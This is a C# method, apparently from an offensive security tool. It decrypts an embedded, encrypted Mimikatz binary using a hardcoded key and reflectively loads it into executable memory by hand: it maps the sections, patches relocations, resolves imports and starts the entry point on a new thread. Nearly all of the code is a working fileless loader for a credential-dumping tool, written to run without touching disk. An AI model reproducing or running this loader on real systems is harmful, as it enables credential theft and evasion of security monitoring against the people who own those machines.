public static void Exec() { byte[] latestMimikatz = null; try { //Use Misc Class to encrypt your own files if (IntPtr.Size == 8 ) { //x64 Unpack And Execute latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex64), "password"); //Yes, this is a bad idea. } else if (IntPtr.Size == 4 ) { //x86 Unpack And Execute latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex86), "password"); //Yes, this is a bad idea. } } catch (Exception ex) { while (ex != null) { //Console.WriteLine(ex.Message); ex = ex.InnerException; } } //Console.WriteLine("Downloaded Latest"); PELoader pe = new PELoader(latestMimikatz); IntPtr codebase = IntPtr.Zero; if (pe.Is32BitHeader) { //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4")); codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4")); } else { //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4")); codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4")); } //Copy Sections for (int i = 0; i < pe.FileHeader.NumberOfSections; i++) { IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE); Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData); //Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4")); } //Perform Base Relocation //Calculate Delta IntPtr currentbase = codebase; long delta; if (pe.Is32BitHeader) { delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase); } else { delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase); } //Console.WriteLine("Delta = {0}", delta.ToString("X4")); //Modify Memory Based On Relocation Table IntPtr relocationTable; if (pe.Is32BitHeader) { relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress)); } else { relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress)); } NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION(); relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); IntPtr nextEntry = relocationTable; int sizeofNextBlock = (int)relocationEntry.SizeOfBlock; IntPtr offset = relocationTable; while (true) { NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION(); IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock); relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress); for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++) { IntPtr patchAddr; UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i)); UInt16 type = (UInt16)(value >> 12); UInt16 fixup = (UInt16)(value & 0xfff); switch (type) { case 0x0: break; case 0x3: patchAddr = IntPtrAdd(dest, fixup); //Add Delta To Location. int originalx86Addr = Marshal.ReadInt32(patchAddr); Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta); break; case 0xA: patchAddr = IntPtrAdd(dest, fixup); //Add Delta To Location. long originalAddr = Marshal.ReadInt64(patchAddr); Marshal.WriteInt64(patchAddr, originalAddr + delta); break; } } offset = IntPtrAdd(relocationTable, sizeofNextBlock); sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock; relocationEntry = relocationNextEntry; nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock); if (relocationNextEntry.SizeOfBlock == 0) break; } //Resolve Imports IntPtr z; IntPtr oa1; int oa2; if (pe.Is32BitHeader) { z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress); oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress); oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16)); } else { z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress); oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress); oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16)); } //Get And Display Each DLL To Load IntPtr threadStart; IntPtr hThread; if (pe.Is32BitHeader) { int j = 0; while (true) //HardCoded Number of DLL's Do this Dynamically. { IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress); int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16)); IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12)))); string DllName = Marshal.PtrToStringAnsi(dllNamePTR); if (DllName == "") { break; } IntPtr handle = NativeDeclarations.LoadLibrary(DllName); //Console.WriteLine("Loaded {0}", DllName); int k = 0; while (true) { IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2))); string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2)); IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName); Marshal.WriteInt32(a2, (int)funcAddy); a2 = IntPtrAdd(a2, 4); if (DllFuncName == "") break; k++; } j++; } //Transfer Control To OEP //Console.WriteLine("Executing Mimikatz"); threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint); hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero); NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF); //Console.WriteLine("Thread Complete"); } else { int j = 0; while (true) { IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress); int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16)); IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part? IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12)))); string DllName = Marshal.PtrToStringAnsi(dllNamePTR); if (DllName == "") { break; } IntPtr handle = NativeDeclarations.LoadLibrary(DllName); //Console.WriteLine("Loaded {0}", DllName); int k = 0; while (true) { IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2))); string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2)); ////Console.WriteLine("Function {0}", DllFuncName); IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName); Marshal.WriteInt64(a2, (long)funcAddy); a2 = IntPtrAdd(a2, 8); if (DllFuncName == "") break; k++; } j++; } //Transfer Control To OEP //Console.WriteLine("Executing Mimikatz"); threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint); hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero); NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF); //Console.WriteLine("Thread Complete"); } //Transfer Control To OEP //Console.WriteLine("Thread Complete"); //Console.ReadLine(); } //End Main